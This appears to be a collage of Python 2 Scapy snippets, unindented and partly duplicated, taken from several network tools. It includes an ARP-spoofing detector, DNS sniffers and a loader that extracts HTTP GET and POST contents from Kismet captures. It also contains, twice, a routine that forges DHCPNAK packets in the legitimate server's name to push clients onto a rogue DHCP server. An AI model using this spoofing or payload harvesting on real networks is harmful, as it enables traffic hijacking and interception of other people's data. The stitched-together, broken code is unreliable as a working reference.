def main():
global local_ip
global broadcast
if os.geteuid() != 0:
exit("Need root permission")
sys.exit()
# log file
filename = "spoof.log"
logging.basicConfig(filename=filename, filemode="a", level=logging.DEBUG)
# interface
interface = unicode("en0", "utf-8")
addrs = netifaces.ifaddresses(interface)
try:
local_ip = addrs[netifaces.AF_INET][0]["addr"]
broadcast = addrs[netifaces.AF_INET][0]["broadcast"]
except KeyError:
sys.exit("Cannot read address/broadcast address on interface {}".format(interface))
logging.info("ARP Spoofing Detection Started on {}".format(local_ip))
print("ARP Spoofing Detection Started.")
scapy.sniff(filter="arp", prn=getAdrress, store=0)
pass
def load_pcap():
packets = scapy.PacketList()
for root, dirs, filenames in os.walk(config.KismetPath):
for file in filenames:
filename = os.path.join(root, file)
if not filename.endswith('.dump'):
continue
new = scapy.sniff(offline=filename, lfilter = is_http)
# print 'new', len(new)
packets.extend(new)
print 'Summary', packets.summary()
for p in packets:
print p.lastlayer().name, p.load
scapy.wrpcap('Packets.dump', packets)
# Spoofing a DHCPNAK from the legit DHCP server when a DHCPREQUEST is send from the DHCP client.
def nak_request(pkt):
msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'], 2)
sendp(
Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst) /
IP(src=globals()['dhcp_server_ip'], dst=pkt[IP].dst) /
UDP(sport=67, dport=68) / BOOTP(op=2,
ciaddr=pkt[IP].src,
siaddr=pkt[IP].dst,
chaddr=pkt[Ether].src,
xid=pkt[BOOTP].xid) /
DHCP(options=[('server_id', globals()['dhcp_server_ip']),
('message-type', 'nak'), ('end')]))
sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] +
" and (port 67 or 68)",
prn=get_dhcp_server,
store=0,
count=1,
timeout=1)
if globals().has_key('dhcp_server_ip') == False:
print("No other DHCP server found, exiting")
sys.exit(0)
sniff(filter="arp or (udp and (port 67 or 68))",
prn=detect_dhcp_request,
store=0)
nak_request(pkt)
else:
msg("Giving up on spoofing DHCPNAK's for " + pkt[Ether].src + ", failed " +
str(globals()['limit']) + " times",2)
del globals()['attempted_dhcpnaks'][pkt[Ether].src]
if pkt[ARP] and pkt[ARP].op == 0x0002:
if globals()['macs'].has_key(pkt[Ether].src) == True:
if pkt[ARP].hwdst == globals()['illegal_dhcp_server_mac']:
msg("Succes: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " +
pkt[ARP].psrc + "from the illegal DHCP server",1)
elif pkt[ARP].hwdst == globals()['dhcp_server_mac']:
msg("Failure: DHCP client " + pkt[ARP].hwsrc + " obtained a lease for " +
pkt[ARP].psrc + " from the legit DHCP server",1)
del globals()['macs'][pkt[Ether].src]
# Spoofing a DHCPNAK from the legit DHCP server when a DHCPREQUEST is send from the DHCP client.
def nak_request(pkt):
msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'],2)
sendp(Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst)/
IP(src=globals()['dhcp_server_ip'],dst=pkt[IP].dst)/UDP(sport=67,dport=68)/
BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)/
DHCP(options=[('server_id',globals()['dhcp_server_ip']),('message-type','nak'), ('end')]))
sniff(filter="udp and not host " + globals()['illegal_dhcp_server_ip'] + " and (port 67 or 68)",
prn=get_dhcp_server, store=0, count=1, timeout=1)
if globals().has_key('dhcp_server_ip') == False:
print("No other DHCP server found, exiting")
sys.exit(0)
sniff(filter="arp or (udp and (port 67 or 68))", prn=detect_dhcp_request, store=0)
def main():
scapy.sniff(iface="eth0",count=1,filter="udp port 53",prn=procPacket)
def read_pcap(filepath, packets):
sniff(offline=filepath, prn=add_packet(packets))
def run_capture(interface, duration, packets):
sniff(iface=interface,
timeout=float(duration),
store=0,
prn=add_packet(packets))
def main():
scapy.sniff(iface="eth0", count=1, filter="udp port 53", prn=procPacket)
import os, scapy
import config
def is_http(p):
if not p.haslayer('TCP') or p.dport != 80 or not p.haslayer('Raw'):
return False
return p.load.startswith('GET') or p.load.startswith('POST')
packets = scapy.PacketList()
for root, dirs, filenames in os.walk(config.KismetPath):
for file in filenames:
filename = os.path.join(root, file)
if not filename.endswith('.dump'):
continue
new = scapy.sniff(offline=filename, lfilter = is_http)
print 'new', len(new)
packets.extend(new)
#print 'Summary', packets.summary()
for p in packets:
print p.lastlayer().name, p.load
scapy.wrpcap('Packets.dump', packets)
def sniff_packet(interface):
scapy.sniff(iface=interface, store=False, prn=process_packets)
def read_pcap(filepath, packets):
sniff(offline=filepath,
prn=add_packet(packets)
)
def run_capture(interface, duration, packets):
sniff(iface=interface,
timeout=float(duration),
store=0,
prn=add_packet(packets)
)